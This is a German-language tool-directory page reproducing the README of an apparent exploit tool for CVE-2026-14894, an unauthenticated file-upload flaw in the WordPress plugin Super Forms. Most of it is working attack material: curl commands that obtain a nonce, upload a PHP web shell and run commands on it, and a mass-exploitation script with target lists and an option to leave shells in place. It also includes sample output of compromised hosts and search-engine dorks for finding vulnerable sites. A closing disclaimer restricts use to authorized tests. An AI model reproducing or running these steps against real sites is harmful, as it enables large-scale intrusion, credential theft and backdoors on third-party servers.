Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-14894 — Super Forms Nicht authentifizierter Datei-Upload RCE | CVSS 9.8 | Kitploit
Tools/GitHubGitHub/shinthink/cve-2026-14894
AufklärungPayload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungWebsicherheitPenetrationstestsLernen & Bildung
GitHubshinthink/cve-2026-14894

CVE-2026-14894

Super Forms Nicht authentifizierter Datei-Upload RCE | CVSS 9.8

111vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
Teilen

CVE-2026-14894 — Super Forms Unauthenticated File Upload RCE

Nonce-Leck → datauristring-Upload → Code-Ausführung


Übersicht

CVE-2026-14894 ist eine kritische (CVSS 9.8) unauthentifizierte Schwachstelle für willkürlichen Datei-Upload im WordPress-Plugin Super Forms – Drag & Drop Form Builder (von WebRehab) in den Versionen ≤ 6.3.313.

Der super_submit_form nopriv AJAX-Handler akzeptiert Datei-Uploads über Formulareingaben, ohne:

  1. Die Authentifizierung des Benutzers zu überprüfen
  2. Den Dateityp oder die Erweiterung zu validieren
  3. Den MIME-Inhalt anhand von Magic-Bytes zu prüfen

Die Nonce-Schranke wird trivial umgangen – ein separater nopriv AJAX-Handler (super_create_nonce) generiert gültige Nonces für jeden nicht authentifizierten Besucher.

Angreifer laden willkürliche PHP-Dateien über Base64-kodierte datauristring-Payloads hoch, die direkt nach /wp-content/uploads/superforms/ mit dem vom Angreifer kontrollierten Dateinamen geschrieben werden – dies führt zur direkten Code-Ausführung.

Betroffene Versionen

VersionStatus
≤ 6.3.313Angreifbar
6.3.314+Gepatcht

Aktive Installationen: 600.000+
Entdeckt von: andrea bocchetti via Wordfence (7. Juli 2026)


Schwachstellenmechanismus

Ursache

Drei fehlende Sicherheitsprüfungen im AJAX-Datei-Upload-Handler von Super Forms:

root@kitploit:~
// Angreifbar: nopriv AJAX – keine Authentifizierung, keine Dateitypvalidierung, keine MIME-Prüfung
add_action('wp_ajax_nopriv_super_create_nonce', 'super_create_nonce');  // Nonce für jeden
add_action('wp_ajax_nopriv_super_submit_form', 'super_submit_form');   // Upload für jeden

function super_submit_form() {
    $data = json_decode(stripslashes($_POST['data']), true);
    $file = $data['sf_upload_field']['files'][0];
    $content = base64_decode($file['datauristring']);  // keine MIME-Validierung
    $name = $file['value'];                             // keine Dateinamen-Bereinigung
    fwrite(fopen($upload_path . $name, 'w'), $content); // PHP wird auf die Festplatte geschrieben
}

Nonce-Umgehung

root@kitploit:~
// Jeder kann eine gültige Nonce erhalten – keine Authentifizierung erforderlich
function super_create_nonce() {
    $nonce = md5(uniqid(rand(), true));
    $_SESSION['sf_nonce'] = $nonce;
    echo $nonce;  // wird an den nicht authentifizierten Angreifer zurückgegeben
}

Angriffsablauf

root@kitploit:~
1. POST /wp-admin/admin-ajax.php?action=super_create_nonce
   → Gültige Nonce erhalten (keine Authentifizierung nötig)

2. POST /wp-admin/admin-ajax.php?action=super_submit_form
   sf_nonce=NONCE&form_id=1&data={"sf_upload_field":{"files":[{
     "datauristring":"data:image/png;base64,PD9waHAgc3lzdGVt...",
     "value":"shell.php"}]}}
   → Shell wird nach /wp-content/uploads/superforms/ geschrieben

3. GET /wp-content/uploads/superforms/shell.php?c=id
   → RCE bestätigt

Installation

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-14894.git
cd CVE-2026-14894
pip install -r requirements.txt

Nutzung

root@kitploit:~
# Einzelnes Ziel
python cve_2026_14894.py -t target.com

# Massen-Exploit
python cve_2026_14894.py -f targets.txt

# Massen-Exploit + Ergebnisse speichern
python cve_2026_14894.py -f targets.txt -o shells.txt

# Shells auf dem Ziel belassen
python cve_2026_14894.py -t target.com --no-cleanup

# Debug-Modus (jede Anfrage anzeigen)
python cve_2026_14894.py -t target.com --debug

Argumente

root@kitploit:~
  -t, --target      Einzelnes Ziel (Domain oder IP)
  -f, --file        Zielliste, eine pro Zeile
  -o, --output      RCE-Ergebnisse in Datei speichern
  --threads         Gleichzeitige Worker (Standard: 30)
  --no-cleanup      Shells auf dem Ziel belassen
  --debug           Jede HTTP-Anfrage + Phase in Echtzeit anzeigen
  -v, --verbose     Ausführliche Ausgabe anzeigen

Proof of Concept

Einzelnes Ziel

root@kitploit:~
$ python cve_2026_14894.py -t target.com --debug
root@kitploit:~
  Super Forms | CVE-2026-14894 | CVSS 9.8

  [target.com] [+] Super Forms detected v6.3.312
  [target.com] [*] Nonce obtained
  [target.com] [*] Uploading shell...
  [target.com] [!] RCE confirmed

  Host       : target.com
  SuperForms : YES v6.3.312
  Upload     : YES
  RCE        : YES
  Shell      : https://target.com/wp-content/uploads/superforms/think_abc.php?t=TOKEN
  Output     : uid=33(www-data) gid=33(www-data)
  Time       : 2.1s

Massenscan

root@kitploit:~
  Targets: 2500  |  Threads: 30

  [RCE]    target-vuln-01.com                                 2.1s  v6.3.312
  [UP]     target-patched-02.com                              1.8s  v6.3.314 (upload blocked)
  [!]      target-no-plugin-03.com                            0.5s  not installed
  [150/2500] 6%  |  SuperForms:47  Upload:18  RCE:12

  ───────────────────────────────────────────────────────
  Done | 180s | Targets:2500 Det:47 Upload:18 RCE:12

Manueller Exploit

Schritt 1 – Nonce abrufen

root@kitploit:~
curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
  -d 'action=super_create_nonce'
# Gibt eine Nonce mit 96 Hex-Zeichen zurück

Schritt 2 – PHP-Shell hochladen

root@kitploit:~
NONCE="abc123..."
SHELL_B64=$(echo '<?php system($_GET["c"]); ?>' | base64 -w0)

curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
  -d 'action=super_submit_form' \
  -d "sf_nonce=$NONCE" \
  -d 'form_id=1' \
  -d 'data={"sf_upload_field":{"type":"files","files":[{"datauristring":"data:image/png;base64,'$SHELL_B64'","value":"shell.php","name":"shell.php","label":"attachment"}]}}'

Schritt 3 – Befehle ausführen

root@kitploit:~
curl -sk 'https://target.com/wp-content/uploads/superforms/shell.php?c=id'

FOFA-Dork

root@kitploit:~
body="wp-content/plugins/super-forms"

Shodan

root@kitploit:~
http.html:"super-forms"

Auswirkungen

Ein erfolgreicher Exploit führt zur Remote-Code-Ausführung als Webserver-Benutzer. Davon ausgehend:

  • wp-config.php auslesen → Datenbank-Anmeldedaten
  • Zugriff auf alle WordPress-Inhalte, Benutzer und Plugin-Daten
  • Permanente Backdoors einspielen
  • Zu internen Netzwerken wechseln

Haftungsausschluss

NUR FÜR BILDUNGSZWECKE UND AUTORISIERTE TESTS.

Diese Software ist vorgesehen für Sicherheitsexperten, die autorisierte Penetrationstests durchführen, Organisationen, die ihre eigene Infrastruktur prüfen, und Forscher, die Schwachstellen-Exploits untersuchen.

Unbefugter Zugriff auf Computersysteme ist illegal und kann Folgendes verletzen:

  • Vereinigte Staaten: Computer Fraud and Abuse Act (18 U.S.C. 1030)
  • Indonesien: UU ITE Pasal 30 & 46
  • Europäische Union: Richtlinie 2013/40/EU
  • Vereinigtes Königreich: Computer Misuse Act 1990

Die Autoren übernehmen keine Haftung für Missbrauch.


Referenzen

RessourceLink
Wordfence Advisory

Dieses Projekt steht in keiner Verbindung zu WebRehab oder Super Forms.

Tool herunterladen
wordfence.com
IONIX Advisoryionix.io
NVD EntryCVE-2026-14894
Researcherandrea bocchetti